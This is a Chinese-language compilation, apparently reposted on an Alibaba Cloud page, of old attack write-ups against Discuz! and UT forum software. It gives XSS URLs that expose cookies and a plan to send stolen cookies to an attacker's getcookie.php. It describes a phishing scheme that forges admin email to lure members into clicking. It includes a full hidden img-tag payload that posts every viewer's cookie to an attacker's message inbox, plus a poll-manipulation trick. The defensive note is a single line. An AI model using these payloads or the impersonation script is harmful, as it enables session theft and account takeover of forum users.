Discuz!跨站大全

來源:互聯網
上載者:User
在discuz!的發貼、回貼、PM等中的subject都沒有經過過濾,所以也可以添加代碼。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22

效果是首先彈出自己的cookie
利用方法:把上述代碼放置到img中。

適用版本:discuz!2.x
discuz!3.x
一種利用discuz!2.0漏洞進行欺騙獲得cookie的嘗試

通過測試XXXFan論壇的PM功能存在一個安全性漏洞,具體描述如下:
XXXFan的給某個會員發送悄悄的連結如下(假定這個會員名字為XXXFan)
http://XXX/pm.php?action=send&username=XXXFan

因為論壇程式對會員名字沒有進行過濾,而是直接顯示在發送到欄目中(TO:),所以可以在名字後面加上script代碼。例如

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script><b%20"

上面的連結點擊以後首先彈出的是自己的cookie內容。
當然我們可以先在自己的網站上構造一個程式來收集cookie,類似於
getcookie.php?cookie=

但是如何來誘使會員點擊呢,如果簡單的放在論壇上,太容易被識別。所以可以利用discuz論壇程式的另外一個功能,“文章介紹給朋友”功能。

因為discuz的這個功能對填寫的emial地址沒有進行任何過濾、辨別和模版,可以偽造任何人給別人發信,安全性很高。利用這個功能我們就可以偽造ExploitFan的管理員給某個會員發一封信,誘使會員點擊我們準備的URL,如果誘使就看自己的手段了,例如可以說“論壇正在測試新功能,請您協助點擊上面地址,我們會在後台記錄您的點擊在合適的時間會給您增加積分以做獎勵”等等。

因為連結地址是XXXFan的,而且發信人和郵件地址都是XXXFan的官方地址,所以可信度非常高,而且不會留下任何把柄。當然為了更高的安全性,可以在<script>裡的內容加密,以進一步增加隱蔽性。

至於得到cookie如何做,可以嘗試cookie欺騙或者是暴力破解MD5密碼

本方法適用於大部分使用discuz2.0的論壇,至於discuz3.0的利用方法請參與在我以前發表的discuz!悄悄話漏洞
【BUG】Discuz!投票的BUG
投票可以用
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
(n為選項,從0開始)
的方式通過URL來直接投票

但是如果n>最大選項呢,嘻嘻~
照樣提交成功,不過增加了一個標題為空白的選項

效果見:
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
(那個最後的空白的是我剛加的)

該漏洞存在的版本:
Discuz!3.X
Discuz!2.X(可能,沒有測試過)
Discuz!的代碼漏洞
這是接著昨天發現的漏洞所展開的,第一發現者(PK0909)。

具體的描述就不說了,下面是一個簡單的測試代碼。

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E

上面的代碼是顯示出自己的cookie

下面是在某個比較有名的論壇的測試代碼,無論誰察看該網頁都會把cookie送到指定的會員簡訊箱裡,隱蔽性很好,就是如果有人引用你的貼,哈哈~這裡都會跑出來,露餡了

[ img]xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]
發現discuz!UT 跨域網站的指令碼漏洞--短訊息篇有關跨域網站的指令碼漏洞,已經算是非常平成並普遍的漏洞了。
有關具體的訊息可以參閱:
http://www.cert.org/advisories/CA-2000-02.html
下面針對Discuz、UT論壇程式的悄悄話部分加以說明

漏洞適應版本:
Discuz1.X
Discuz!2.0(0609,0820版)
Discuz!3.X
UT 1.0

漏洞描述:

discuz!給指定會員發送悄悄話使用的是類似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的語句,但是name沒有經過過濾直接顯示在發送短訊息的頁面中,這就給偷cookie或者更嚴重的破壞開啟了方便之門。

Discuz!3.X已經改為http://XXX.net/pm.php?action=send&uid=XXXX類似的語句,避免了這個漏洞,但是在選擇簡訊檔案夾的時候卻沒有經過過濾。同樣產生了上面的漏洞



http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url]
,上面的例子是顯示自己的cookie。(針對Discuz!1.X Discuz!2.X)

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
顯示自己的cookie。(針對Discuz!3.X)

UT雖然在主題上經過了過濾,也就是說把%27轉換為';但是其收件者卻沒有過濾,所以同樣有類似的漏洞。例子略。(在不同的UT論壇上發現其代碼不盡相同,但是總的來說都有類似的漏洞)


危害度:中弱

預防辦法:
點擊超級連結時請注意其真實內容。更多的安全補丁請密切關注官方論壇。

相關文章

Beyond APAC's No.1 Cloud

19.6% IaaS Market Share in Asia Pacific - Gartner IT Service report, 2018

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。